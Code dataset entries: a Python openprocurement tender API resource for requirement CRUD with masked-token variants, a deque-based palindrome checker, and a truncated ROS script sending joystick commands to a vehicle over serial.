criterion_id=self.request.validated["criterion"].id,
requirement_group_id=self.request.validated["requirement_group"].id,
requirement_id=requirement.id
)
return {"data": requirement.serialize("view")}
@json_view(permission="view_tender")
def collection_get(self):
return {"data": [i.serialize("view") for i in self.request.context.requirements]}
@json_view(permission="view_tender")
def get(self):
return {"data": self.request.validated["requirement"].serialize("view")}
@json_view(
content_type="application/json",
validators=(
validate_change_requirement_objects,
validate_patch_requirement_data,
),
permission="edit_tender"
)
def patch(self):
requirement = self.request.context
apply_patch(self.request, save=False, src=requirement.serialize())
tender = self.request.validated["tender"]
if self.request.authenticated_role == "tender_owner" and hasattr(tender, "invalidate_bids_data"):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info(
"Updated {}".format(requirement.id),
extra=context_unpack(self.request, {"MESSAGE_ID": "requirement_group_requirement_patch"}),
)
return {"data": requirement.serialize("view")}
@json_view(
content_type="application/json",
validators=(
validate_put_requirement_objects,
validate_patch_requirement_data,
),
permission="edit_tender"
)
def put(self):
old_requirement = self.request.context
requirement = old_requirement
if self.request.validated["data"].get("status") != "cancelled":
model = type(old_requirement)
data = copy(self.request.validated["data"])
for attr_name in type(old_requirement)._fields:
if data.get(attr_name) is None:
data[attr_name] = getattr(old_requirement, attr_name)
# To avoid new version creation if no changes and only id's were regenerated
if "eligibleEvidences" not in self.request.json.get("data", {}):
data["eligibleEvidences"] = [
evidence.to_primitive(role="create") for evidence in getattr(old_requirement, "eligibleEvidences")
]
requirement = model(data)
if old_requirement.to_primitive() == requirement.to_primitive():
return {"data": (old_requirement.serialize("view"),)}
requirement.datePublished = get_now()
requirement.dateModified = None
self.request.validated["requirement_group"].requirements.append(requirement)
if old_requirement.status == "active":
old_requirement.status = "cancelled"
old_requirement.dateModified = get_now()
tender = self.request.validated["tender"]
if (
self.request.authenticated_role == "tender_owner"
and tender.status == "active.tendering"
and hasattr(tender, "invalidate_bids_data")
):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info(
"New version of requirement {}".format(requirement.id),
extra=context_unpack(self.request, {"MESSAGE_ID": "requirement_group_requirement_put"}),
)
return {"data": (requirement.serialize("view"), old_requirement.serialize("view_old"))}
|
flexible
|
{
"blob_id": "6194079dd506553b4e5b66f1fb92bb8642704b59",
"index": 6893,
"step-1": "<mask token>\n\n\nclass BaseTenderCriteriaRGRequirementResource(APIResource):\n <mask token>\n\n @json_view(permission='view_tender')\n def collection_get(self):\n return {'data': [i.serialize('view') for i in self.request.context.\n requirements]}\n <mask token>\n\n @json_view(content_type='application/json', validators=(\n validate_change_requirement_objects,\n validate_patch_requirement_data), permission='edit_tender')\n def patch(self):\n requirement = self.request.context\n apply_patch(self.request, save=False, src=requirement.serialize())\n tender = self.request.validated['tender']\n if self.request.authenticated_role == 'tender_owner' and hasattr(tender\n , 'invalidate_bids_data'):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Updated {}'.format(requirement.id), extra=\n context_unpack(self.request, {'MESSAGE_ID':\n 'requirement_group_requirement_patch'}))\n return {'data': requirement.serialize('view')}\n\n @json_view(content_type='application/json', validators=(\n validate_put_requirement_objects, validate_patch_requirement_data),\n permission='edit_tender')\n def put(self):\n old_requirement = self.request.context\n requirement = old_requirement\n if self.request.validated['data'].get('status') != 'cancelled':\n model = type(old_requirement)\n data = copy(self.request.validated['data'])\n for attr_name in type(old_requirement)._fields:\n if data.get(attr_name) is None:\n data[attr_name] = getattr(old_requirement, attr_name)\n if 'eligibleEvidences' not in self.request.json.get('data', {}):\n data['eligibleEvidences'] = [evidence.to_primitive(role=\n 'create') for evidence in getattr(old_requirement,\n 'eligibleEvidences')]\n requirement = model(data)\n if old_requirement.to_primitive() == requirement.to_primitive():\n return {'data': (old_requirement.serialize('view'),)}\n requirement.datePublished = get_now()\n requirement.dateModified = None\n self.request.validated['requirement_group'].requirements.append(\n requirement)\n if old_requirement.status == 'active':\n old_requirement.status = 'cancelled'\n old_requirement.dateModified = get_now()\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('New version of requirement {}'.format(\n requirement.id), extra=context_unpack(self.request, {\n 'MESSAGE_ID': 'requirement_group_requirement_put'}))\n return {'data': (requirement.serialize('view'), old_requirement\n .serialize('view_old'))}\n",
"step-2": "<mask token>\n\n\nclass BaseTenderCriteriaRGRequirementResource(APIResource):\n\n @json_view(content_type='application/json', validators=(\n validate_operation_ecriteria_objects,\n validate_patch_exclusion_ecriteria_objects,\n validate_requirement_data), permission='edit_tender')\n def collection_post(self):\n requirement = self.request.validated['requirement']\n self.request.context.requirements.append(requirement)\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Created requirement group requirement {}'.\n format(requirement.id), extra=context_unpack(self.request,\n {'MESSAGE_ID': 'requirement_group_requirement_create'}, {\n 'requirement_id': requirement.id}))\n self.request.response.status = 201\n self.request.response.headers['Location'] = self.request.route_url(\n '{}:Requirement Group Requirement'.format(self.request.\n validated['tender'].procurementMethodType), tender_id=self.\n request.validated['tender_id'], criterion_id=self.request.\n validated['criterion'].id, requirement_group_id=self.\n request.validated['requirement_group'].id, requirement_id=\n requirement.id)\n return {'data': requirement.serialize('view')}\n\n @json_view(permission='view_tender')\n def collection_get(self):\n return {'data': [i.serialize('view') for i in self.request.context.\n requirements]}\n <mask token>\n\n @json_view(content_type='application/json', validators=(\n validate_change_requirement_objects,\n validate_patch_requirement_data), permission='edit_tender')\n def patch(self):\n requirement = self.request.context\n apply_patch(self.request, save=False, src=requirement.serialize())\n tender = self.request.validated['tender']\n if self.request.authenticated_role == 'tender_owner' and hasattr(tender\n , 'invalidate_bids_data'):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Updated {}'.format(requirement.id), extra=\n context_unpack(self.request, {'MESSAGE_ID':\n 'requirement_group_requirement_patch'}))\n return {'data': requirement.serialize('view')}\n\n @json_view(content_type='application/json', validators=(\n validate_put_requirement_objects, validate_patch_requirement_data),\n permission='edit_tender')\n def put(self):\n old_requirement = self.request.context\n requirement = old_requirement\n if self.request.validated['data'].get('status') != 'cancelled':\n model = type(old_requirement)\n data = copy(self.request.validated['data'])\n for attr_name in type(old_requirement)._fields:\n if data.get(attr_name) is None:\n data[attr_name] = getattr(old_requirement, attr_name)\n if 'eligibleEvidences' not in self.request.json.get('data', {}):\n data['eligibleEvidences'] = [evidence.to_primitive(role=\n 'create') for evidence in getattr(old_requirement,\n 'eligibleEvidences')]\n requirement = model(data)\n if old_requirement.to_primitive() == requirement.to_primitive():\n return {'data': (old_requirement.serialize('view'),)}\n requirement.datePublished = get_now()\n requirement.dateModified = None\n self.request.validated['requirement_group'].requirements.append(\n requirement)\n if old_requirement.status == 'active':\n old_requirement.status = 'cancelled'\n old_requirement.dateModified = get_now()\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('New version of requirement {}'.format(\n requirement.id), extra=context_unpack(self.request, {\n 'MESSAGE_ID': 'requirement_group_requirement_put'}))\n return {'data': (requirement.serialize('view'), old_requirement\n .serialize('view_old'))}\n",
"step-3": "<mask token>\n\n\nclass BaseTenderCriteriaRGRequirementResource(APIResource):\n\n @json_view(content_type='application/json', validators=(\n validate_operation_ecriteria_objects,\n validate_patch_exclusion_ecriteria_objects,\n validate_requirement_data), permission='edit_tender')\n def collection_post(self):\n requirement = self.request.validated['requirement']\n self.request.context.requirements.append(requirement)\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Created requirement group requirement {}'.\n format(requirement.id), extra=context_unpack(self.request,\n {'MESSAGE_ID': 'requirement_group_requirement_create'}, {\n 'requirement_id': requirement.id}))\n self.request.response.status = 201\n self.request.response.headers['Location'] = self.request.route_url(\n '{}:Requirement Group Requirement'.format(self.request.\n validated['tender'].procurementMethodType), tender_id=self.\n request.validated['tender_id'], criterion_id=self.request.\n validated['criterion'].id, requirement_group_id=self.\n request.validated['requirement_group'].id, requirement_id=\n requirement.id)\n return {'data': requirement.serialize('view')}\n\n @json_view(permission='view_tender')\n def collection_get(self):\n return {'data': [i.serialize('view') for i in self.request.context.\n requirements]}\n\n @json_view(permission='view_tender')\n def get(self):\n return {'data': self.request.validated['requirement'].serialize('view')\n }\n\n @json_view(content_type='application/json', validators=(\n validate_change_requirement_objects,\n validate_patch_requirement_data), permission='edit_tender')\n def patch(self):\n requirement = self.request.context\n apply_patch(self.request, save=False, src=requirement.serialize())\n tender = self.request.validated['tender']\n if self.request.authenticated_role == 'tender_owner' and hasattr(tender\n , 'invalidate_bids_data'):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Updated {}'.format(requirement.id), extra=\n context_unpack(self.request, {'MESSAGE_ID':\n 'requirement_group_requirement_patch'}))\n return {'data': requirement.serialize('view')}\n\n @json_view(content_type='application/json', validators=(\n validate_put_requirement_objects, validate_patch_requirement_data),\n permission='edit_tender')\n def put(self):\n old_requirement = self.request.context\n requirement = old_requirement\n if self.request.validated['data'].get('status') != 'cancelled':\n model = type(old_requirement)\n data = copy(self.request.validated['data'])\n for attr_name in type(old_requirement)._fields:\n if data.get(attr_name) is None:\n data[attr_name] = getattr(old_requirement, attr_name)\n if 'eligibleEvidences' not in self.request.json.get('data', {}):\n data['eligibleEvidences'] = [evidence.to_primitive(role=\n 'create') for evidence in getattr(old_requirement,\n 'eligibleEvidences')]\n requirement = model(data)\n if old_requirement.to_primitive() == requirement.to_primitive():\n return {'data': (old_requirement.serialize('view'),)}\n requirement.datePublished = get_now()\n requirement.dateModified = None\n self.request.validated['requirement_group'].requirements.append(\n requirement)\n if old_requirement.status == 'active':\n old_requirement.status = 'cancelled'\n old_requirement.dateModified = get_now()\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('New version of requirement {}'.format(\n requirement.id), extra=context_unpack(self.request, {\n 'MESSAGE_ID': 'requirement_group_requirement_put'}))\n return {'data': (requirement.serialize('view'), old_requirement\n .serialize('view_old'))}\n",
"step-4": "from copy import copy\nfrom openprocurement.api.utils import json_view, context_unpack, APIResource, get_now\nfrom openprocurement.tender.core.utils import save_tender, apply_patch\nfrom openprocurement.tender.core.validation import validate_requirement_data, validate_patch_requirement_data, validate_operation_ecriteria_objects, validate_patch_exclusion_ecriteria_objects, validate_change_requirement_objects, validate_put_requirement_objects\n\n\nclass BaseTenderCriteriaRGRequirementResource(APIResource):\n\n @json_view(content_type='application/json', validators=(\n validate_operation_ecriteria_objects,\n validate_patch_exclusion_ecriteria_objects,\n validate_requirement_data), permission='edit_tender')\n def collection_post(self):\n requirement = self.request.validated['requirement']\n self.request.context.requirements.append(requirement)\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Created requirement group requirement {}'.\n format(requirement.id), extra=context_unpack(self.request,\n {'MESSAGE_ID': 'requirement_group_requirement_create'}, {\n 'requirement_id': requirement.id}))\n self.request.response.status = 201\n self.request.response.headers['Location'] = self.request.route_url(\n '{}:Requirement Group Requirement'.format(self.request.\n validated['tender'].procurementMethodType), tender_id=self.\n request.validated['tender_id'], criterion_id=self.request.\n validated['criterion'].id, requirement_group_id=self.\n request.validated['requirement_group'].id, requirement_id=\n requirement.id)\n return {'data': requirement.serialize('view')}\n\n @json_view(permission='view_tender')\n def collection_get(self):\n return {'data': [i.serialize('view') for i in self.request.context.\n requirements]}\n\n @json_view(permission='view_tender')\n def get(self):\n return {'data': self.request.validated['requirement'].serialize('view')\n }\n\n @json_view(content_type='application/json', validators=(\n validate_change_requirement_objects,\n validate_patch_requirement_data), permission='edit_tender')\n def patch(self):\n requirement = self.request.context\n apply_patch(self.request, save=False, src=requirement.serialize())\n tender = self.request.validated['tender']\n if self.request.authenticated_role == 'tender_owner' and hasattr(tender\n , 'invalidate_bids_data'):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Updated {}'.format(requirement.id), extra=\n context_unpack(self.request, {'MESSAGE_ID':\n 'requirement_group_requirement_patch'}))\n return {'data': requirement.serialize('view')}\n\n @json_view(content_type='application/json', validators=(\n validate_put_requirement_objects, validate_patch_requirement_data),\n permission='edit_tender')\n def put(self):\n old_requirement = self.request.context\n requirement = old_requirement\n if self.request.validated['data'].get('status') != 'cancelled':\n model = type(old_requirement)\n data = copy(self.request.validated['data'])\n for attr_name in type(old_requirement)._fields:\n if data.get(attr_name) is None:\n data[attr_name] = getattr(old_requirement, attr_name)\n if 'eligibleEvidences' not in self.request.json.get('data', {}):\n data['eligibleEvidences'] = [evidence.to_primitive(role=\n 'create') for evidence in getattr(old_requirement,\n 'eligibleEvidences')]\n requirement = model(data)\n if old_requirement.to_primitive() == requirement.to_primitive():\n return {'data': (old_requirement.serialize('view'),)}\n requirement.datePublished = get_now()\n requirement.dateModified = None\n self.request.validated['requirement_group'].requirements.append(\n requirement)\n if old_requirement.status == 'active':\n old_requirement.status = 'cancelled'\n old_requirement.dateModified = get_now()\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('New version of requirement {}'.format(\n requirement.id), extra=context_unpack(self.request, {\n 'MESSAGE_ID': 'requirement_group_requirement_put'}))\n return {'data': (requirement.serialize('view'), old_requirement\n .serialize('view_old'))}\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom copy import copy\n\nfrom openprocurement.api.utils import (\n json_view,\n context_unpack,\n APIResource,\n get_now,\n)\nfrom openprocurement.tender.core.utils import save_tender, apply_patch\nfrom openprocurement.tender.core.validation import (\n validate_requirement_data,\n validate_patch_requirement_data,\n validate_operation_ecriteria_objects,\n validate_patch_exclusion_ecriteria_objects,\n validate_change_requirement_objects,\n validate_put_requirement_objects,\n)\n\n\nclass BaseTenderCriteriaRGRequirementResource(APIResource):\n\n @json_view(\n content_type=\"application/json\",\n validators=(\n validate_operation_ecriteria_objects,\n validate_patch_exclusion_ecriteria_objects,\n validate_requirement_data,\n ),\n permission=\"edit_tender\"\n )\n def collection_post(self):\n\n requirement = self.request.validated[\"requirement\"]\n self.request.context.requirements.append(requirement)\n tender = self.request.validated[\"tender\"]\n if (\n self.request.authenticated_role == \"tender_owner\"\n and tender.status == \"active.tendering\"\n and hasattr(tender, \"invalidate_bids_data\")\n ):\n tender.invalidate_bids_data()\n\n if save_tender(self.request):\n self.LOGGER.info(\n \"Created requirement group requirement {}\".format(requirement.id),\n extra=context_unpack(\n self.request,\n {\"MESSAGE_ID\": \"requirement_group_requirement_create\"},\n {\"requirement_id\": requirement.id},\n ),\n )\n self.request.response.status = 201\n self.request.response.headers[\"Location\"] = self.request.route_url(\n \"{}:Requirement Group Requirement\".format(self.request.validated[\"tender\"].procurementMethodType),\n tender_id=self.request.validated[\"tender_id\"],\n criterion_id=self.request.validated[\"criterion\"].id,\n requirement_group_id=self.request.validated[\"requirement_group\"].id,\n requirement_id=requirement.id\n )\n return {\"data\": requirement.serialize(\"view\")}\n\n @json_view(permission=\"view_tender\")\n def collection_get(self):\n return {\"data\": [i.serialize(\"view\") for i in self.request.context.requirements]}\n\n @json_view(permission=\"view_tender\")\n def get(self):\n return {\"data\": self.request.validated[\"requirement\"].serialize(\"view\")}\n\n @json_view(\n content_type=\"application/json\",\n validators=(\n validate_change_requirement_objects,\n validate_patch_requirement_data,\n ),\n permission=\"edit_tender\"\n )\n def patch(self):\n requirement = self.request.context\n apply_patch(self.request, save=False, src=requirement.serialize())\n tender = self.request.validated[\"tender\"]\n\n if self.request.authenticated_role == \"tender_owner\" and hasattr(tender, \"invalidate_bids_data\"):\n tender.invalidate_bids_data()\n\n if save_tender(self.request):\n self.LOGGER.info(\n \"Updated {}\".format(requirement.id),\n extra=context_unpack(self.request, {\"MESSAGE_ID\": \"requirement_group_requirement_patch\"}),\n )\n return {\"data\": requirement.serialize(\"view\")}\n\n @json_view(\n content_type=\"application/json\",\n validators=(\n validate_put_requirement_objects,\n validate_patch_requirement_data,\n ),\n permission=\"edit_tender\"\n )\n def put(self):\n old_requirement = self.request.context\n requirement = old_requirement\n if self.request.validated[\"data\"].get(\"status\") != \"cancelled\":\n model = type(old_requirement)\n data = copy(self.request.validated[\"data\"])\n for attr_name in type(old_requirement)._fields:\n if data.get(attr_name) is None:\n data[attr_name] = getattr(old_requirement, attr_name)\n # To avoid new version creation if no changes and only id's were regenerated\n if \"eligibleEvidences\" not in self.request.json.get(\"data\", {}):\n data[\"eligibleEvidences\"] = [\n evidence.to_primitive(role=\"create\") for evidence in getattr(old_requirement, \"eligibleEvidences\")\n ]\n\n requirement = model(data)\n if old_requirement.to_primitive() == requirement.to_primitive():\n return {\"data\": (old_requirement.serialize(\"view\"),)}\n\n requirement.datePublished = get_now()\n requirement.dateModified = None\n self.request.validated[\"requirement_group\"].requirements.append(requirement)\n\n if old_requirement.status == \"active\":\n old_requirement.status = \"cancelled\"\n old_requirement.dateModified = get_now()\n\n tender = self.request.validated[\"tender\"]\n if (\n self.request.authenticated_role == \"tender_owner\"\n and tender.status == \"active.tendering\"\n and hasattr(tender, \"invalidate_bids_data\")\n ):\n tender.invalidate_bids_data()\n\n if save_tender(self.request):\n self.LOGGER.info(\n \"New version of requirement {}\".format(requirement.id),\n extra=context_unpack(self.request, {\"MESSAGE_ID\": \"requirement_group_requirement_put\"}),\n )\n return {\"data\": (requirement.serialize(\"view\"), old_requirement.serialize(\"view_old\"))}\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
class Node:
def __init__(self,data):
self.data = data
self.next = None
self.prev = None
class dequeue:
def __init__(self):
self.front = None
self.last = None
self.count = 0
def add_front(self, data):
new_nodef = Node(data)
if(self.front == None):
self.front = self.last = new_nodef
self.count +=1
else:
new_nodef.next = self.front
self.front.prev = new_nodef
self.front = new_nodef
self.count +=1
def add_last(self,data):
new_nodeb = Node(data)
if(self.last == None):
self.last = self.front = new_nodeb
self.count +=1
else:
new_nodeb.prev = self.last
self.last.next = new_nodeb
self.last = new_nodeb
self.count +=1
def print_list(self):
if(self.front == None):
return
temp = self.front
while(temp != None):
print(temp.data)
temp = temp.next
def remove_front(self):
if(self.front == None):
return
else:
self.front = self.front.next
if(self.front == None):
self.last = None
return
self.count -= 1
self.front.prev = None
def remove_last(self):
if(self.last == None):
return
else:
self.last = self.last.prev
if(self.last == None):
self.front = None
return
self.count -= 1
self.last.next = None
def is_empty(self):
if(self.count == 0):
return True
else:
return False
def size(self):
print(self.count)
def entry(self):
pal_to_check = str(input("Enter the string to check whether palindrome or not :"))
pal_list = [str(i) for i in pal_to_check]
print(pal_list)
pal_check_con = llist.pal_check(pal_list)
print("Is palindrome :",pal_check_con)
def pal_check(self, pal_lis):
for i in pal_lis:
llist.add_front(i)
while(self.count != 0):
if(self.front.data == self.last.data):
llist.remove_front()
if(self.count > 1):
llist.remove_last()
else:
return False
if(self.count == 1):
break
return True
#Driver function
if __name__=="__main__":
llist = dequeue()
llist.entry()
|
normal
|
{
"blob_id": "2f6e0b6a7e14ac9c5a38db6fd2b1cf23cff7144e",
"index": 172,
"step-1": "<mask token>\n\n\nclass dequeue:\n\n def __init__(self):\n self.front = None\n self.last = None\n self.count = 0\n\n def add_front(self, data):\n new_nodef = Node(data)\n if self.front == None:\n self.front = self.last = new_nodef\n self.count += 1\n else:\n new_nodef.next = self.front\n self.front.prev = new_nodef\n self.front = new_nodef\n self.count += 1\n <mask token>\n\n def print_list(self):\n if self.front == None:\n return\n temp = self.front\n while temp != None:\n print(temp.data)\n temp = temp.next\n\n def remove_front(self):\n if self.front == None:\n return\n else:\n self.front = self.front.next\n if self.front == None:\n self.last = None\n return\n self.count -= 1\n self.front.prev = None\n\n def remove_last(self):\n if self.last == None:\n return\n else:\n self.last = self.last.prev\n if self.last == None:\n self.front = None\n return\n self.count -= 1\n self.last.next = None\n <mask token>\n\n def size(self):\n print(self.count)\n <mask token>\n\n def pal_check(self, pal_lis):\n for i in pal_lis:\n llist.add_front(i)\n while self.count != 0:\n if self.front.data == self.last.data:\n llist.remove_front()\n if self.count > 1:\n llist.remove_last()\n else:\n return False\n if self.count == 1:\n break\n return True\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass dequeue:\n\n def __init__(self):\n self.front = None\n self.last = None\n self.count = 0\n\n def add_front(self, data):\n new_nodef = Node(data)\n if self.front == None:\n self.front = self.last = new_nodef\n self.count += 1\n else:\n new_nodef.next = self.front\n self.front.prev = new_nodef\n self.front = new_nodef\n self.count += 1\n <mask token>\n\n def print_list(self):\n if self.front == None:\n return\n temp = self.front\n while temp != None:\n print(temp.data)\n temp = temp.next\n\n def remove_front(self):\n if self.front == None:\n return\n else:\n self.front = self.front.next\n if self.front == None:\n self.last = None\n return\n self.count -= 1\n self.front.prev = None\n\n def remove_last(self):\n if self.last == None:\n return\n else:\n self.last = self.last.prev\n if self.last == None:\n self.front = None\n return\n self.count -= 1\n self.last.next = None\n\n def is_empty(self):\n if self.count == 0:\n return True\n else:\n return False\n\n def size(self):\n print(self.count)\n\n def entry(self):\n pal_to_check = str(input(\n 'Enter the string to check whether palindrome or not :'))\n pal_list = [str(i) for i in pal_to_check]\n print(pal_list)\n pal_check_con = llist.pal_check(pal_list)\n print('Is palindrome :', pal_check_con)\n\n def pal_check(self, pal_lis):\n for i in pal_lis:\n llist.add_front(i)\n while self.count != 0:\n if self.front.data == self.last.data:\n llist.remove_front()\n if self.count > 1:\n llist.remove_last()\n else:\n return False\n if self.count == 1:\n break\n return True\n\n\n<mask token>\n",
"step-3": "class Node:\n <mask token>\n\n\nclass dequeue:\n\n def __init__(self):\n self.front = None\n self.last = None\n self.count = 0\n\n def add_front(self, data):\n new_nodef = Node(data)\n if self.front == None:\n self.front = self.last = new_nodef\n self.count += 1\n else:\n new_nodef.next = self.front\n self.front.prev = new_nodef\n self.front = new_nodef\n self.count += 1\n\n def add_last(self, data):\n new_nodeb = Node(data)\n if self.last == None:\n self.last = self.front = new_nodeb\n self.count += 1\n else:\n new_nodeb.prev = self.last\n self.last.next = new_nodeb\n self.last = new_nodeb\n self.count += 1\n\n def print_list(self):\n if self.front == None:\n return\n temp = self.front\n while temp != None:\n print(temp.data)\n temp = temp.next\n\n def remove_front(self):\n if self.front == None:\n return\n else:\n self.front = self.front.next\n if self.front == None:\n self.last = None\n return\n self.count -= 1\n self.front.prev = None\n\n def remove_last(self):\n if self.last == None:\n return\n else:\n self.last = self.last.prev\n if self.last == None:\n self.front = None\n return\n self.count -= 1\n self.last.next = None\n\n def is_empty(self):\n if self.count == 0:\n return True\n else:\n return False\n\n def size(self):\n print(self.count)\n\n def entry(self):\n pal_to_check = str(input(\n 'Enter the string to check whether palindrome or not :'))\n pal_list = [str(i) for i in pal_to_check]\n print(pal_list)\n pal_check_con = llist.pal_check(pal_list)\n print('Is palindrome :', pal_check_con)\n\n def pal_check(self, pal_lis):\n for i in pal_lis:\n llist.add_front(i)\n while self.count != 0:\n if self.front.data == self.last.data:\n llist.remove_front()\n if self.count > 1:\n llist.remove_last()\n else:\n return False\n if self.count == 1:\n break\n return True\n\n\n<mask token>\n",
"step-4": "class Node:\n\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n\n\nclass dequeue:\n\n def __init__(self):\n self.front = None\n self.last = None\n self.count = 0\n\n def add_front(self, data):\n new_nodef = Node(data)\n if self.front == None:\n self.front = self.last = new_nodef\n self.count += 1\n else:\n new_nodef.next = self.front\n self.front.prev = new_nodef\n self.front = new_nodef\n self.count += 1\n\n def add_last(self, data):\n new_nodeb = Node(data)\n if self.last == None:\n self.last = self.front = new_nodeb\n self.count += 1\n else:\n new_nodeb.prev = self.last\n self.last.next = new_nodeb\n self.last = new_nodeb\n self.count += 1\n\n def print_list(self):\n if self.front == None:\n return\n temp = self.front\n while temp != None:\n print(temp.data)\n temp = temp.next\n\n def remove_front(self):\n if self.front == None:\n return\n else:\n self.front = self.front.next\n if self.front == None:\n self.last = None\n return\n self.count -= 1\n self.front.prev = None\n\n def remove_last(self):\n if self.last == None:\n return\n else:\n self.last = self.last.prev\n if self.last == None:\n self.front = None\n return\n self.count -= 1\n self.last.next = None\n\n def is_empty(self):\n if self.count == 0:\n return True\n else:\n return False\n\n def size(self):\n print(self.count)\n\n def entry(self):\n pal_to_check = str(input(\n 'Enter the string to check whether palindrome or not :'))\n pal_list = [str(i) for i in pal_to_check]\n print(pal_list)\n pal_check_con = llist.pal_check(pal_list)\n print('Is palindrome :', pal_check_con)\n\n def pal_check(self, pal_lis):\n for i in pal_lis:\n llist.add_front(i)\n while self.count != 0:\n if self.front.data == self.last.data:\n llist.remove_front()\n if self.count > 1:\n llist.remove_last()\n else:\n return False\n if self.count == 1:\n break\n return True\n\n\n<mask token>\n",
"step-5": "class Node:\n\n def __init__(self,data):\n self.data = data\n self.next = None\n self.prev = None \n\nclass dequeue:\n\n def __init__(self):\n self.front = None\n self.last = None\n self.count = 0\n\n def add_front(self, data):\n new_nodef = Node(data)\n if(self.front == None):\n self.front = self.last = new_nodef\n self.count +=1\n else:\n new_nodef.next = self.front\n self.front.prev = new_nodef\n self.front = new_nodef\n self.count +=1\n\n \n def add_last(self,data):\n new_nodeb = Node(data)\n if(self.last == None):\n self.last = self.front = new_nodeb\n self.count +=1\n\n else:\n new_nodeb.prev = self.last\n self.last.next = new_nodeb\n self.last = new_nodeb \n self.count +=1\n \n def print_list(self):\n if(self.front == None):\n return\n temp = self.front\n while(temp != None):\n print(temp.data)\n temp = temp.next\n\n def remove_front(self):\n if(self.front == None):\n return\n else:\n self.front = self.front.next\n if(self.front == None):\n self.last = None\n return\n self.count -= 1\n self.front.prev = None\n\n def remove_last(self):\n if(self.last == None):\n return\n else:\n self.last = self.last.prev\n if(self.last == None):\n self.front = None\n return\n self.count -= 1 \n self.last.next = None\n \n def is_empty(self):\n if(self.count == 0):\n return True\n else: \n return False\n def size(self):\n print(self.count)\n \n\n def entry(self):\n \n pal_to_check = str(input(\"Enter the string to check whether palindrome or not :\"))\n pal_list = [str(i) for i in pal_to_check]\n print(pal_list)\n pal_check_con = llist.pal_check(pal_list)\n print(\"Is palindrome :\",pal_check_con)\n \n def pal_check(self, pal_lis): \n for i in pal_lis:\n llist.add_front(i)\n while(self.count != 0):\n if(self.front.data == self.last.data):\n llist.remove_front()\n if(self.count > 1):\n llist.remove_last() \n else:\n return False\n if(self.count == 1):\n break \n return True\n\n\n#Driver function\nif __name__==\"__main__\":\n \n llist = dequeue()\n llist.entry()\n\n",
"step-ids": [
8,
10,
12,
13,
15
]
}
|
[
8,
10,
12,
13,
15
] |
#!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist
from sensor_msgs.msg import Joy
import serial
from sys import platform
if platform == "linux" or platform == "linux2":
ser = serial.Serial('/dev/ttyACM0')
elif platform == "darwin":
pass
elif platform == "win32":
# Windows...
ser = serial.Serial('COM16')
"""
In this test code we are testing basic vehicle control over the network
we use ROS middleware to send the control commands
This script runs at the remote driver end.
Receives joystick messages (subscribed to Joy topic)
then converts the joystick inputs into commands
WE ARE NOT USING THIS METHOD NOW
--- WE HAVE SEPERATED OUT ALL THE STREAMS FROM THE JOYSTICK
"""
oldvar = 0
first_a = 0
first_d = 0
# Configuatrion tuned for CAR in LOW speed
base_throttle = 5500
peak_throttle = 6500
base_brake = 450
peak_brake = 600
button = 0
def callback(data):
global first_a
global first_d
global oldvar
global base_throttle
global peak_throttle
global base_brake
global peak_brake
global button
# print data
axis1 = -data.axes[1]
axis3 = -data.axes[3] # in logitech axis 3 is axis 4 confirm with ashish
button1 = data.buttons[1]
button4 = data.buttons[4]
button5 = data.buttons[5]
button_ = button1+button4+button5
if axis1 > 0.1:
bval = int((axis1) * (peak_brake - base_brake) + base_brake)
print(bval)
ser.write(str(bval).encode('utf-8'))
ser.write("a".encode('utf-8'))
#### ser.write("4000a".encode('utf-8')) #throttle released on braking
print("Brake")
elif (axis1 < -0.1 and axis3 < 0.1):
tval = int((axis1 * -1 + axis3 * -1) * (peak_throttle - base_throttle) * 0.5 + base_throttle)
if (abs(tval - oldvar) > 5):
#print(tval)
ser.write(str(tval).encode('utf-8'))
ser.write("a".encode('utf-8'))
ser.write("450a".encode('utf-8')) # brake released on acceleration
print("Throttle")
oldvar = tval
elif (axis1 > -0.1 and axis1 < 0.1):
ser.write("4000a".encode('utf-8'))
ser.write("450a".encode('utf-8')) # brake released
print("Zero Throttle")
print (axis1)
print (axis3)
if button1 == 1:
print("Emergency Brake")
ser.write("4600a".encode('utf-8')) # throttle released
ser.write("600a".encode('utf-8')) # brake engaged
if (button4 and button5 == 0):
if (first_a == 0):
ser.write("1000a".encode('utf-8'))
print("Joystick button 4 pressed.")
first_a = 1
if (button5 and button4 == 0):
